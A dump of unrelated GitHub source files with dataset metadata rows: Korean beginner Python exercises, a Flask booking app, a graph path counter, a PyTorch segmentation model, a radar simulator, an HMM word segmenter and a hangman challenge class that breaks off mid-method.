num = number.split("-")[0]
if num == "011":
com = "SKT"
elif num == "016":
com = "KT"
elif num == "019":
com = "LGU"
else:
com = "알수없음"
print(f"당신은 {com} 사용자입니다.")
# 126
zip_code = input("우편번호: ")
zip_code = zip_code[:3]
if zip_code in ["010", "011", "012"]:
print("강북구")
elif zip_code in ["014", "015", "016"]:
print("도봉구")
else:
print("노원구")
# 127
num = input("주민등록번호: ")
num = num.split("-")[1]
if num[0] == "1" or num[0] == "3":
print("남자")
else:
print("여자")
# 128
num = input("주민등록번호: ")
num = num.split("-")[1]
if 0 <= num[1:3] <= 8:
print("서울")
else:
print("서울X")
# 129
num = input("주민등록번호: ")
계산1 = int(num[0]) * 2 + int(num[1]) * 3 + int(num[2]) * 4 + int(num[3]) * 5 + int(num[4]) * 6 + \
int(num[5]) * 7 + int(num[7]) * 8 + int(num[8]) * 9 + int(num[9]) * 2 + int(num[10])* 3 + \
int(num[11])* 4 + int(num[12]) * 5
계산2 = 11 - (계산1 % 11)
계산3 = str(계산2)
if num[-1] == 계산3[-1]:
print("유효한 주민등록번호입니다.")
else:
print("유효하지 않은 주민등록번호입니다.")
# 130
import requests
btc = requests.get("https://api.bithumb.com/public/ticker/").json()['data']
변동폭 = float(btc['max_price']) - float(btc['min_price'])
시가 = float(btc['opening_price'])
최고가 = float(btc['max_price'])
if (시가+변동폭) > 최고가:
print("상승장")
else:
print("하락장")
| teddygood/Python-practice | Python_for_beginners/Python_for_beginners_121~130.py | Python_for_beginners_121~130.py | py | 2,337 | python | ko | code | 0 | github-code | 90 |
9322318415 | import json
from datetime import datetime
from flask import Flask, flash, redirect, render_template, request, url_for
def loadClubs():
with open("clubs.json") as c:
listOfClubs = json.load(c)["clubs"]
return listOfClubs
def loadCompetitions():
with open("competitions.json") as comps:
listOfCompetitions = json.load(comps)["competitions"]
return listOfCompetitions
app = Flask(__name__)
app.secret_key = "something_special"
competitions = loadCompetitions()
clubs = loadClubs()
actual_date = str(datetime.now())
@app.route("/")
def index():
return render_template("index.html")
@app.route("/showSummary", methods=["POST"])
def show_summary() -> str:
try:
club = [club for club in clubs if club["email"] == request.form["email"]][0]
return render_template(
"welcome.html", club=club, competitions=competitions, date=actual_date
)
except IndexError:
return render_template(
"index.html", error_message="Sorry, that email wasn't found. Try again."
)
@app.route("/book/<competition>/<club>")
def book(competition, club):
foundClub = [c for c in clubs if c["name"] == club][0]
foundCompetition = [c for c in competitions if c["name"] == competition][0]
if foundClub and foundCompetition and foundCompetition["date"] >= actual_date:
return render_template(
"booking.html", club=foundClub, competition=foundCompetition
)
else:
flash("Something went wrong-please try again")
return render_template(
"welcome.html", club=club, competitions=competitions, date=actual_date
)
@app.route("/purchasePlaces", methods=["POST"])
def purchasePlaces():
competition = [c for c in competitions if c["name"] == request.form["competition"]][
0
]
club = [c for c in clubs if c["name"] == request.form["club"]][0]
placesRequired = int(request.form["places"])
placesCompetition = int(competition["numberOfPlaces"])
clubPoints = int(club["points"])
if placesRequired <= 0:
flash("Ne peut être inférieur ou égal à 0")
elif placesRequired > placesCompetition:
flash(
"Attention, vous avez selectionner plus de places que le nombre de place maximum."
)
elif placesRequired > 12:
flash("Vous ne pouvez pas réserver plus de 12 places à la fois.")
elif clubPoints < placesRequired*3:
flash("Vous n'avez pas assez de points")
else:
competition["numberOfPlaces"] = placesCompetition - placesRequired
club["points"] = int(club["points"]) - placesRequired*3
flash("Great-booking complete!")
return render_template(
"welcome.html", club=club, competitions=competitions, date=actual_date
)
@app.route('/displayboard')
def club_table():
return render_template('displayboard.html', clubs=clubs)
@app.route("/logout")
def logout():
return redirect(url_for("index"))
| PierreRtec/P11_Rondeau_Pierre | server.py | server.py | py | 2,999 | python | en | code | 0 | github-code | 90 |
18020834379 | # -*- coding: utf-8 -*-
N, M = map(int, input().split(' '))
graph = [[] for _ in range(N)]
for _ in range(M):
a, b = map(int, input().split(' '))
a -= 1
b -= 1
graph[a].append(b)
graph[b].append(a)
is_used = [False for _ in range(N)]
is_used[0] = True
buf = [(0, is_used)]
ans = 0
while buf:
src, is_used = buf.pop()
if all(is_used):
ans += 1
else:
for dst in graph[src]:
if not is_used[dst]:
is_used2 = list(is_used)
is_used2[dst] = True
buf.append((dst, is_used2))
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p03805/s351396896.py | s351396896.py | py | 593 | python | en | code | 0 | github-code | 90 |
10407682459 | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from .resnet import resnet101
class FCN(nn.Module):
def __init__(self, out_channels=19, output_stride=4, mode='bilinear'):
super(FCN, self).__init__()
self.output_stride = output_stride
self.ResNet = resnet101(output_stride=output_stride, pretrained=True)
del self.ResNet.avgpool
del self.ResNet.fc
# FCN
layer4_channels = 2048
self.aspp = ASPP_Module(inplanes=layer4_channels, output_stride=output_stride)
aspp_channels = 1280
self.final_conv = nn.Sequential(nn.Conv2d(aspp_channels, 256, kernel_size=1, bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.Conv2d(256, out_channels, kernel_size=1, bias=True))
initialize_weights(self.final_conv)
self.upsample = nn.Upsample(scale_factor=output_stride, mode=mode)
def forward(self, x):
x = self.ResNet(x)
x = self.aspp(x)
# Final stage:
x = self.final_conv(x)
if self.output_stride > 1:
return self.upsample(x)
else:
return x
class ASPP_Module(nn.Module):
def __init__(self, inplanes, output_stride=16):
super(ASPP_Module, self).__init__()
scale = 16//output_stride
planes = 256
dilation0 = scale*6
self.conv0 = nn.Sequential( nn.Conv2d(inplanes, planes, kernel_size=3, stride=1, padding=dilation0, dilation=dilation0, bias=False))
# nn.BatchNorm2d(planes))
initialize_weights(self.conv0)
dilation1 = scale*12
self.conv1 = nn.Sequential( nn.Conv2d(inplanes, planes, kernel_size=3, stride=1, padding=dilation1, dilation=dilation1, bias=False))
# nn.BatchNorm2d(planes))
initialize_weights(self.conv1)
dilation2 = scale*18
self.conv2 = nn.Sequential( nn.Conv2d(inplanes, planes, kernel_size=3, stride=1, padding=dilation2, dilation=dilation2, bias=False))
# nn.BatchNorm2d(planes))
initialize_weights(self.conv2)
self.conv3 = nn.Sequential( nn.Conv2d(inplanes, planes, kernel_size=1, stride=1, bias=False))
# nn.BatchNorm2d(planes))
initialize_weights(self.conv3)
self.aspp_pooling = ASPP_Pooling(inplanes, planes)
def forward(self, x):
x0 = self.conv0(x)
x1 = self.conv1(x)
x2 = self.conv2(x)
x3 = self.conv3(x)
pool = self.aspp_pooling(x)
return torch.cat([x3, x0, x1, x2, pool], dim=1)
class ASPP_Pooling(nn.Module):
def __init__(self, inplanes, planes):
super(ASPP_Pooling, self).__init__()
self.conv = nn.Sequential( nn.Conv2d(inplanes, planes, kernel_size=1, stride=1, bias=False))
# nn.BatchNorm2d(planes))
initialize_weights(self.conv)
def forward(self, x):
size = [x.size(2), x.size(3)]
pool = F.avg_pool2d(x, size)
pool = self.conv(pool)
return F.upsample(pool, size=size, scale_factor=None, mode='bilinear')
def initialize_weights(*models):
for model in models:
for module in model.modules():
if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):
nn.init.kaiming_normal(module.weight)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.BatchNorm2d):
module.weight.data.fill_(1)
module.bias.data.zero_()
| inferno-pytorch/neurofire | neurofire/models/fcn/fcn.py | fcn.py | py | 3,805 | python | en | code | 7 | github-code | 90 |
73775179495 | import torch
import matplotlib.pyplot as plt
import numpy as np
def plot_embedding_heatmap(embeddings):
embedding_dim = len(embeddings[0])
num_embeddings = len(embeddings)
# Plot heatmap
fig, ax = plt.subplots()
im = ax.imshow(embeddings)
# Set axis labels
ax.set_xticks(np.arange(embedding_dim))
ax.set_yticks(np.arange(num_embeddings))
# Rotate the tick labels and set their alignment.
""" plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor") """
# Loop over data dimensions and create text annotations.
""" for i in range(len(embeddings)):
for j in range(len(embeddings[0])):
text = ax.text(j, i, embeddings[i, j],
ha="center", va="center", color="w") """
""" ax.set_title("Embedding Matrix Heatmap") """
fig.tight_layout()
plt.show() | mattmegarry/rnn-lstm-transformers | name-decoder/vis_utils.py | vis_utils.py | py | 887 | python | en | code | 0 | github-code | 90 |
26473666953 | # coding=UTF-8
import utils.Coor as coor
from utils.obj import Obj
from utils.radar import Radar
import random as rd
import json
from PyQt5.QtCore import QObject, pyqtSlot
import sys
class Radar_det(QObject):
def __init__(self,ip="127.0.0.1/6789",radardata=None,radar=None,obj=None,obj_num=0):
super().__init__()
self.ip = ip
self.radardata = radardata
self.radar = radar
self.obj = obj
self.obj_num = obj_num
@pyqtSlot(str,result=str)
def radar_set(self,ip_p):
self.ip_p = ip_p
# 设定坐标原点(地图左上角)
ori = (35.958385067108026, 120.04422809586613)
global ori_xy
ori_xy = coor.millerToXY(ori)
obj = {}
obj_num = rd.randint(4,10)
#ori_value['obj_num'] = obj_num
# print('目标的初始状态')
#print('----------------')
for i in range(obj_num):
obj[i] = Obj()
obj[i].get_random_value()
#--------读取想定---------------
with open("radar.txt", "r") as f: # 打开文件
radardata = eval(f.read()) # 读取文件
# print('目标的初始状态')
#print('----------------')
radar = {}
for k in range(len(radardata)):
radar[k+1] = Radar(ori_xy, coor.to_origin(ori_xy, radardata['radar{}'.format(k+1)]))
self.radardata = radardata
self.radar = radar
self.obj = obj
self.obj_num = obj_num
return "雷达初始化成功\n" + "雷达个数:" + str(len(radardata)) + "\n" + "目标个数:" + str(obj_num)
print("雷达初始化成功")
print("雷达个数",len(radardata))
print("目标个数",obj_num)
@pyqtSlot(result=str)
def radar_detect(self):
radardata = self.radardata
radar = self.radar
obj = self.obj
obj_num = self.obj_num
for k in range(len(radardata)):
#print('radar{}:'.format(k+1))
#print('----------------')
return radar[k+1].run([obj[i].move() for i in range(obj_num)],self.ip_p)
| SikeX/unman_GUI | radar.py | radar.py | py | 2,147 | python | en | code | 1 | github-code | 90 |
23539363915 | #!/usr/bin/python3
import socket, sys, threading
import os, requests, json, time
bearer_token = os.environ.get('BEARER_TOKEN')# this is my bearer token
print("My Bearer Token Is Not None:{}".format(bearer_token!=None))
def create_url():
return "https://api.twitter.com/2/tweets/sample/stream"
def bearer_oauth(r):
"""
Method required by bearer token authentication.
"""
r.headers["Authorization"] = f"Bearer {bearer_token}"
r.headers["User-Agent"] = "v2SampledStreamPython"
return r
if len(sys.argv) != 3:
print("Usage: netcat.py HOSTNAME PORT", file=sys.stderr)
sys.exit(-1)
HOST = sys.argv[1]
PORT = int(sys.argv[2])
#request the stream
response = requests.request("GET", create_url(), auth=bearer_oauth, stream=True)
print("Response Status Is:{}".format(response.status_code))
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORT))
s.listen()
clients = []
def accept():
client, address = s.accept()
print(f'New client @ {address}')
clients.append(client)
threading.Thread(target=accept).start()
threading.Thread(target=accept).start()
while True:
if len(clients) > 0:
for response_line in response.iter_lines():
if response_line:
data = json.loads(response_line)['data']['text']
for client in clients:
try:
print(f'Sending {data.rstrip()} to {client.getpeername()}')
client.sendall(data.encode())
#sleep for 0.5 second to slow down the stream
time.sleep(0.5)
except:
clients.remove(client)
if response.status_code != 200:
raise Exception(
"Request returned an error: {} {}".format(
response.status_code, response.text
)
)
| The-Sad-Zewalian/Hashtagor | Feed_Stream.py | Feed_Stream.py | py | 2,051 | python | en | code | 0 | github-code | 90 |
1881681576 | import unittest.mock as mock
from analyticsclient.client import Client
from ddt import data, ddt, unpack
from django.test import TestCase, override_settings
from analytics_dashboard.courses.presenters.programs import ProgramsPresenter
from analytics_dashboard.courses.tests.utils import (
CourseSamples,
ProgramSamples,
get_mock_programs,
)
@ddt
class ProgramsPresenterTests(TestCase):
def setUp(self):
self.maxDiff = None
super().setUp()
@property
def mock_api_response(self):
'''
Returns a mocked API response for programs including some null fields.
'''
return get_mock_programs()
def get_expected_programs(self, program_ids=None, course_ids=None):
''''Expected results with default values, sorted, and filtered to program_ids.'''
if program_ids is None:
programs = self.mock_api_response
else:
programs = [program for program in self.mock_api_response if program['program_id'] in program_ids]
if course_ids is None:
filtered_programs = programs
else:
filtered_programs = []
for program in programs:
for course_id in course_ids:
if course_id in program['course_ids']:
filtered_programs.append(program)
break
# fill in with defaults
for program in filtered_programs:
for field in ProgramsPresenter.NON_NULL_STRING_FIELDS:
if program[field] is None:
program[field] = ''
# sort by title
return sorted(
filtered_programs,
key=lambda x: (not x['program_title'], x['program_title']))
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
# First element is the program_ids filter, second is the course_ids filter
@data(
[None, None],
[[ProgramSamples.DEMO_PROGRAM_ID], None],
[[ProgramSamples.DEMO_PROGRAM_ID, ProgramSamples.DEMO_PROGRAM2_ID], None],
[None, [CourseSamples.DEMO_COURSE_ID]],
[None, [CourseSamples.DEPRECATED_DEMO_COURSE_ID]],
[None, [CourseSamples.DEMO_COURSE_ID, CourseSamples.DEPRECATED_DEMO_COURSE_ID]],
[[ProgramSamples.DEMO_PROGRAM_ID], [CourseSamples.DEMO_COURSE_ID]],
[[ProgramSamples.DEMO_PROGRAM2_ID], [CourseSamples.DEPRECATED_DEMO_COURSE_ID]],
[[ProgramSamples.DEMO_PROGRAM_ID], [CourseSamples.DEMO_COURSE_ID, CourseSamples.DEPRECATED_DEMO_COURSE_ID]],
)
@unpack
def test_get_programs(self, program_ids, course_ids):
''''Test programs filtered from API response.'''
presenter = ProgramsPresenter(Client('base_url'))
with mock.patch('analyticsclient.programs.Programs.programs',
mock.Mock(return_value=self.mock_api_response)):
actual_programs = presenter.get_programs(program_ids=program_ids, course_ids=course_ids)
self.assertListEqual(actual_programs, self.get_expected_programs(program_ids=program_ids,
course_ids=course_ids))
| openedx/edx-analytics-dashboard | analytics_dashboard/courses/tests/test_presenters/test_programs.py | test_programs.py | py | 3,256 | python | en | code | 72 | github-code | 90 |
22858855872 | import pygame
pygame.init()
class Grid():
color = (0, 0, 0)
def __init__(self, screen_height, screen_width, rows, columns):
self.rows = rows
self.columns = columns
self.grid_width = screen_width//columns #dividing equal pixels
assert (screen_width % columns !=1), "modify screen width or noumber of columns"
self.grid_height = screen_height//rows
assert (screen_height % rows !=1), "modify screen height or noumber of rows"
def clicked(self, pos):
row_index = pos[1]//self.grid_height
column_index = pos[0]//self.grid_width
return (row_index, column_index)
def drawGrid(self, screen):
for i in range(self.rows):
pygame.draw.line(screen, Grid.color, (0, i*self.grid_height), (self.rows*self.grid_width, i*self.grid_height))
for i in range(self.columns + 1):
pygame.draw.line(screen, Grid.color, (i*self.grid_width, 0), (i*self.grid_width, self.columns*self.grid_width))
class Tiles():
def __init__(self, grid_width, grid_height, index, color1, color2, color3, color4, parent=None):
self.width = grid_width
self.height = grid_height
self.index = index
self.empty_color, self.wall_color, self.explored_color = color1, color2, color3
self.recently_discovered_color = color4
self.color = self.empty_color
self.type = 1 # wall--0; empty--1; explored--2; newly discovered-- -1
self.parent = parent
self.text = None
def makeWall(self):
self.color = self.wall_color
self.type = 0
def makeNewlyDiscovered(self, parent):
self.color = self.recently_discovered_color
self.type = -1
self.parent = parent
def makeExplored(self):
if type(self.type) == int:
self.color = self.explored_color
self.type = 0
def makepath(self):
self.color = (150,100,150)
def makeStartEnd(self, type): # MAKE START/END ICONS
self.color = (0, 0, 0)
self.type = type # 'end' and 'start'
def drawTile(self, screen):
x_cor = self.width*self.index[1]
y_cor = self.height*self.index[0]
pygame.draw.rect(screen, self.color, (x_cor, y_cor, self.width, self.height))
if self.text:
font = pygame.font.Font('Arcade.ttf', int(self.width*0.6))
text = font.render(self.text, True, (255,255,255))
screen.blit(text, (self.index[1]*self.width + 10, self.index[0]*self.height + 10))
def render_text(self,screen):
if self.text:
font = pygame.font.Font('Arcade.ttf', int(self.width*0.6))
text = font.render(self.text, True, (255,255,255))
screen.blit(text, (self.index[1]*self.width + 10, self.index[0]*self.height + 10))
def render_label(start_tile, end_tile, screen):
font = pygame.font.Font('ARCADE.TTF', 10) # start/end font
start_label = font.render('Start', True, (255,255,255))
end_label = font.render('end', True, (255,255,255))
screen.blit(start_label, start_tile.index)
screen.blit(end_label, end_tile.index)
def main():
#construction
screen_width = 600
screen_height = 600
screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption("Board")
rows = 12
columns = 12
color1 = (255, 255, 255)
color2 = (255, 0, 0)
color3 = (0, 0, 255)
color4 = (0, 255, 0)
#grid construction
newGrid = Grid(screen_height, screen_width, rows, columns)
# tiles construction
tile_matrix = [[Tiles(newGrid.grid_width, newGrid.grid_height, (i, j), color1, color2, color3, color4)
for j in range(columns)] for i in range(rows)]
makingWalls = False
running = True
while running:
screen.fill((255, 255, 255))
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
# get the clicked tiles
if event.type == pygame.MOUSEBUTTONDOWN:
makingWalls = True
if event.type == pygame.MOUSEBUTTONUP:
makingWalls = False
# making walls
if makingWalls:
pos = pygame.mouse.get_pos()
row_index, column_index = newGrid.clicked(pos)
wall_tile = tile_matrix[row_index][column_index]
wall_tile.makeWall()
# draw grid and tile
for i in tile_matrix:
for j in i:
j.drawTile(screen)
newGrid.drawGrid(screen)
pygame.display.update()
# main()
pygame.quit()
| yogendra-j/Path-Finding-Algorithm-visualizer | Board.py | Board.py | py | 4,656 | python | en | code | 0 | github-code | 90 |
42845617581 | import zmq
import time
start = time.time()
# Spin while a lock file exists or no file found
while True:
try:
open("/ceph/atate/transporter/lockfile", "r")
except IOError:
break
while True:
try:
open("/ceph/atate/transporter/testdata", "r")
except IOError:
continue
else:
print("found")
break
# read and pull lines of the file into list
import os
fsize = os.path.getsize("/ceph/atate/transporter/testdata")
gbytes = fsize / 1000 / 1000 / 1000
f = open("/ceph/atate/transporter/testdata", "r")
a = []
for line in f:
a.append(line)
end = time.time()
walltime = end - start
rate = gbytes/walltime
print ("CEPHFS (RECV): %f GB in %f sec rate=%f GB/s" % (gbytes,walltime,rate))
| tateap/transporter | tests/cephfs/recv.py | recv.py | py | 759 | python | en | code | 0 | github-code | 90 |
32040560158 | from datetime import datetime, timedelta
import pytest
from envinorma.models.classement import Regime
from envinorma.models.condition import Equal, Greater, Littler, OrCondition, Range
from envinorma.models.parameter import ParameterEnum
from envinorma.parametrization.consistency import (
_check_date_conditions_not_compatible,
_check_discrete_conditions_not_compatible,
_date_ranges_strictly_overlap,
_extract_date_range,
_ranges_strictly_overlap,
check_conditions_not_compatible,
)
from envinorma.parametrization.exceptions import ParametrizationError
def test_check_conditions_not_compatible():
for parameter in ParameterEnum:
check_conditions_not_compatible([Equal(parameter.value, '')], parameter.value)
def test_check_discrete_conditions_not_compatible():
reg = ParameterEnum.REGIME.value
_check_discrete_conditions_not_compatible([Equal(reg, Regime.E)], reg)
_check_discrete_conditions_not_compatible([Equal(reg, Regime.E), Equal(reg, Regime.D)], reg)
_check_discrete_conditions_not_compatible([Equal(reg, Regime.E), Equal(reg, Regime.D), Equal(reg, Regime.A)], reg)
_check_discrete_conditions_not_compatible(
[OrCondition(frozenset([Equal(reg, Regime.E), Equal(reg, Regime.D), Equal(reg, Regime.A)]))], reg
)
with pytest.raises(ParametrizationError):
_check_discrete_conditions_not_compatible([Equal(reg, Regime.E), Equal(reg, Regime.E)], reg)
with pytest.raises(ParametrizationError):
_check_discrete_conditions_not_compatible(
[OrCondition(frozenset([Equal(reg, Regime.E), Equal(reg, Regime.D)])), Equal(reg, Regime.D)], reg
)
with pytest.raises(ParametrizationError):
_check_discrete_conditions_not_compatible(
[OrCondition(frozenset([Littler(reg, Regime.E), Equal(reg, Regime.D)])), Equal(reg, Regime.A)], reg
)
def test_extract_date_range():
date_ = ParameterEnum.DATE_INSTALLATION.value
dt_1 = datetime.now()
dt_2 = dt_1 + timedelta(days=1)
assert _extract_date_range(Range(date_, dt_1, dt_2)) == (dt_1, dt_2)
assert _extract_date_range(Equal(date_, dt_1)) == (dt_1, dt_1)
assert _extract_date_range(Littler(date_, dt_1)) == (None, dt_1)
assert _extract_date_range(Greater(date_, dt_1)) == (dt_1, None)
def test_ranges_strictly_overlap():
assert not _ranges_strictly_overlap([])
assert not _ranges_strictly_overlap([(0, 1)])
assert not _ranges_strictly_overlap([(0, 0)])
assert not _ranges_strictly_overlap([(0, 0), (0, 1)])
assert not _ranges_strictly_overlap([(0, 0), (0, 1), (1, 2)])
assert not _ranges_strictly_overlap([(0, 0), (0, 1), (1, 2), (3, 4)])
assert not _ranges_strictly_overlap([(4, 5), (0, 0), (0, 1), (1, 2), (3, 4)])
assert _ranges_strictly_overlap([(4, 5), (4.5, 4.5)])
assert _ranges_strictly_overlap([(4, 5), (4.5, 10.5)])
assert _ranges_strictly_overlap([(4, 5), (0, 10.5)])
assert _ranges_strictly_overlap([(4, 5), (-10, 4.001)])
def test_date_ranges_strictly_overlap():
dt_1 = datetime.now()
dt_2 = dt_1 + timedelta(days=1)
dt_3 = dt_1 + timedelta(days=3)
assert not _date_ranges_strictly_overlap([])
assert not _date_ranges_strictly_overlap([(dt_1, dt_2)])
assert not _date_ranges_strictly_overlap([(dt_1, dt_2), (dt_2, dt_3)])
assert not _date_ranges_strictly_overlap([(dt_1, dt_2), (dt_2, dt_3), (None, dt_1)])
assert not _date_ranges_strictly_overlap([(dt_1, dt_2), (dt_2, dt_3), (None, dt_1), (dt_3, None)])
assert _date_ranges_strictly_overlap([(dt_1, dt_3), (dt_2, dt_3), (None, dt_1), (dt_3, None)])
assert _date_ranges_strictly_overlap([(dt_1, dt_2), (dt_2, dt_3), (None, dt_3), (dt_3, None)])
assert _date_ranges_strictly_overlap([(dt_1, dt_2), (dt_2, dt_3), (None, dt_1), (dt_2, None)])
assert _date_ranges_strictly_overlap([(dt_1, dt_1), (None, None)])
def test_check_date_conditions_not_compatible():
date_ = ParameterEnum.DATE_INSTALLATION.value
dt_1 = datetime.now()
dt_2 = dt_1 + timedelta(days=1)
cd_1 = Range(date_, dt_1, dt_2)
cd_2 = Equal(date_, dt_1)
cd_3 = Littler(date_, dt_1)
cd_4 = Greater(date_, dt_2)
_check_date_conditions_not_compatible([cd_1], date_)
_check_date_conditions_not_compatible([cd_1, cd_2], date_)
_check_date_conditions_not_compatible([cd_1, cd_3, cd_4], date_)
_check_date_conditions_not_compatible([cd_2], date_)
_check_date_conditions_not_compatible([cd_3], date_)
_check_date_conditions_not_compatible([cd_4], date_)
cd_5 = Littler(date_, dt_2)
cd_6 = Greater(date_, dt_1)
with pytest.raises(ParametrizationError):
_check_date_conditions_not_compatible([cd_5, cd_6], date_)
with pytest.raises(ParametrizationError):
_check_date_conditions_not_compatible([cd_1, cd_6], date_)
with pytest.raises(ParametrizationError):
_check_date_conditions_not_compatible([cd_5, cd_1], date_)
| Envinorma/envinorma-data | tests/test_consistency.py | test_consistency.py | py | 4,939 | python | en | code | 4 | github-code | 90 |
72042627496 | import psutil
import signal
import sys
import os
from io import StringIO
from pywinauto import Desktop
from AppOpener import open
def openApp(clientsocket, appName):
original_stdout = sys.stdout
captured_output = StringIO()
sys.stdout = captured_output
open(appName)
# Reset the stdout back to original and get the message
sys.stdout = original_stdout
message = captured_output.getvalue().strip()
if "not found" in message.lower():
clientsocket.send("open_err".encode())
else:
clientsocket.send("open_ok".encode())
def killRunningApp(clientsocket, pid):
try:
os.kill(pid, signal.SIGTERM)
clientsocket.send("kill_ok".encode())
except:
clientsocket.send("kill_err".encode())
# Sending a response to the client about the result
# listRunningApp(clientsocket)
def checkValidApp(w):
try:
full_title = w.window_text()
if full_title == "Taskbar" or full_title == "": return False
proc_id = w.process_id()
process = psutil.Process(proc_id)
thread_count = process.num_threads()
except psutil.NoSuchProcess:
return False
if ' - ' in full_title:
app_name = full_title.rsplit(' - ', 1)[1]
else:
app_name = full_title
return f'{proc_id},{app_name},{thread_count}'
def send_string_list(client_socket, string_list):
data = '|'.join(string_list).encode('utf-8')
# Send the total byte length first
client_socket.sendall(len(data).to_bytes(4, 'big'))
# Send the data
client_socket.sendall(data)
def listRunningApp(clientsocket):
windows = Desktop(backend="uia").windows()
runningApp = []
for w in windows:
tmp = checkValidApp(w)
if (tmp == False) : continue
runningApp.append(tmp)
send_string_list(clientsocket, runningApp)
print("DONE")
| chitien2808/Socket_Programming | server/handleRunningApp.py | handleRunningApp.py | py | 1,881 | python | en | code | 0 | github-code | 90 |
70456427177 | from SI507project_tools import Company, Review, session
import csv
def get_or_create_company(company_dic):
company = Company.query.filter_by(name = company_dic["company"]).first()
if company:
print("This company has already existed.")
return company
if not company:
new_company = Company(name = company_dic["company"], website = company_dic["website"], headquater = company_dic["headquater"], size=company_dic["size"] , founding_time=company_dic["founded"], company_type=company_dic["type"] , industry=company_dic["industry"], revenue=company_dic["revenue"], ceo=company_dic["ceo"])
session.add(new_company)
def insert_company_data(company_dataset):
with open(company_dataset, newline="") as csvfile:
reader = csv.DictReader(csvfile)
for line in reader:
get_or_create_company(line)
session.commit()
#### 2. Define the function for inserting review data ####
def get_or_create_review(review_dic):
review = Review.query.filter_by(id = review_dic[""]).first()
if review:
print("This review has already existed.")
return review
if not review:
company_name = review_dic["company"]
company_for_new_review = Company.query.filter_by(name = company_name).first()
new_review = Review(id=review_dic[""],location=review_dic["location"], dates=review_dic["dates"], job_title=review_dic["job-title"], summary=review_dic["summary"], pros=review_dic["pros"], cons=review_dic["cons"], advice_to_mgmt=review_dic["advice-to-mgmt"], overall_rating=review_dic["overall-ratings"], work_balance_rating=review_dic["work-balance-stars"],culture_values_rating=review_dic["culture-values-stars"], career_opportunity_rating=review_dic["carrer-opportunities-stars"], comp_benefits_rating=review_dic["comp-benefit-stars"], senior_mgmt_rating=review_dic["senior-mangemnet-stars"], helpful_count=review_dic["helpful-count"], link=review_dic["link"], company_id=company_for_new_review.id)
session.add(new_review)
def insert_review_data(review_dataset):
with open(review_dataset, newline="") as csvfile:
reader = csv.DictReader(csvfile)
for line in reader:
get_or_create_review(line)
session.commit()
#### Initiating database ####
if __name__ == "__main__":
pass
| chenlicl0627/SI507-Final-Project | SI507project_db_populate.py | SI507project_db_populate.py | py | 2,323 | python | en | code | 0 | github-code | 90 |
34077748193 | from .nn.op import HMMlayer
import pickle
import re, sys, os
class SegModel():
def __init__(self, model_path):
model = open(model_path, 'rb')
self.transitionProb = pickle.load(model)
self.emissionProb = pickle.load(model)
self.word_list = pickle.load(model)
self.pi = pickle.load(model)
self.states = pickle.load(model)
self.word_dict = pickle.load(model)
def catchStr(self, sentence):
l=[]
l=re.split('(,|。|、|———|/|●)', sentence)
values = l[::2]
delimiters = l[1::2] + ['']
return [v + d for v, d in zip(values, delimiters)]
def convertSentence(self, sentence):
l=[]
for word in sentence:
try:
l.append(self.word_list.index(word))
except ValueError:
l.append(self.word_list.index('。'))
return l
def outPutResult(self, sentence, s_seq, term_list, states):
s = ''
for i in range(len(sentence)):
tag = states[s_seq[i]]
if tag == 'E' or tag == 'S':
# print(term_list[o_seq[i]], end=' ')
s += sentence[i] + " "
else:
# print(term_list[o_seq[i]], end='')
s += sentence[i]
return s
def mfm(self, string, max_len=5):
"""
Max forward match
"""
def getSeg(text):
if not text:
return ''
if len(text) == 1:
return text
if text in self.word_dict:
return text
else:
small = len(text) - 1
text = text[0:small]
return getSeg(text)
max_len = max_len
result_str = ''
result_len = 0
unk = ''
while string:
tmp_str = string[0:max_len]
seg_str = getSeg(tmp_str)
seg_len = len(seg_str)
if seg_len == 1:
unk += seg_str
else:
if unk != '':
s = self.hmm(unk)
result_str = result_str + s
unk = ''
result_len = result_len + seg_len
if seg_str.strip() and seg_len != 1:
result_str = result_str + seg_str + ' '
string = string[seg_len:]
result_str = result_str + ' ' + self.hmm(unk)
return result_str
def hmm(self, sentence): # sentence 为分词后的数组形式
s=''
# print(self.word_list)
windows = self.catchStr(sentence)
# print(windows)
for s_window in windows:
if s_window=='':
continue
o_seq = self.convertSentence(s_window+"。")
s_seq=HMMlayer(o_seq, self.transitionProb, self.emissionProb, self.pi)
s += self.outPutResult(s_window, s_seq, self.word_list, self.states)
return s
def cut(self, string):
result = self.mfm(string)
return result | Woooooody/Neu | Neu/SegModel.py | SegModel.py | py | 3,155 | python | en | code | 2 | github-code | 90 |
43771475303 | fname = input("Enter file name: ")
if len(fname) < 1 : fname = "mbox-short.txt"
count = 0
emails = list()
fh = open(fname)
for line in fh:
line = line.rstrip()
if not line.startswith("From "):continue
words = line.split()
emails = words[1]
count = count + 1
print(emails)
print("There were", count, "lines in the file with From as the first word") | wcontractor/Python4Everybody | DataStructures/wk4/exercise85.py | exercise85.py | py | 356 | python | en | code | 1 | github-code | 90 |
16786761912 | from extra.match.match import Match
class Challenge(Match):
from extra.word.word import Word
from extra.player.player import Player
__slots__ = ["_sender", "_timestamp"]
def __init__(self, word: Word, receiver: Player, sender: Player, chances=5, timestamp=None):
from datetime import datetime
assert chances > 0, f"Chances {chances} must be non-negative"
super().__init__(word, receiver, chances) # receiver is the player.
self._sender = sender
if timestamp is None:
self._timestamp = datetime.now().__str__() # Timestamp
else:
self._timestamp = timestamp
@property
def sender(self):
return self._sender
@property
def timestamp(self):
return self._timestamp
# Overridden method!
def hand_results(self):
from extra.match.status import Status
from extra.data_persistence.database_manager import DatabaseManager
self._sender.performance.challenges_made += 1
self.player.performance.challenges_played += 1
sender_data = {"challenges_made": self._sender.performance.challenges_made}
player_data = {"challenges_played": self.player.performance.challenges_played}
if self.status.status == Status.victory():
self._sender.performance.challenge_defeats += 1
self.player.performance.challenge_victories += 1
sender_data["challenge_defeats"] = self._sender.performance.challenge_defeats
player_data["challenge_victories"] = self.player.performance.challenge_victories
else:
self._sender.performance.challenge_victories += 1
self.player.performance.challenge_defeats += 1
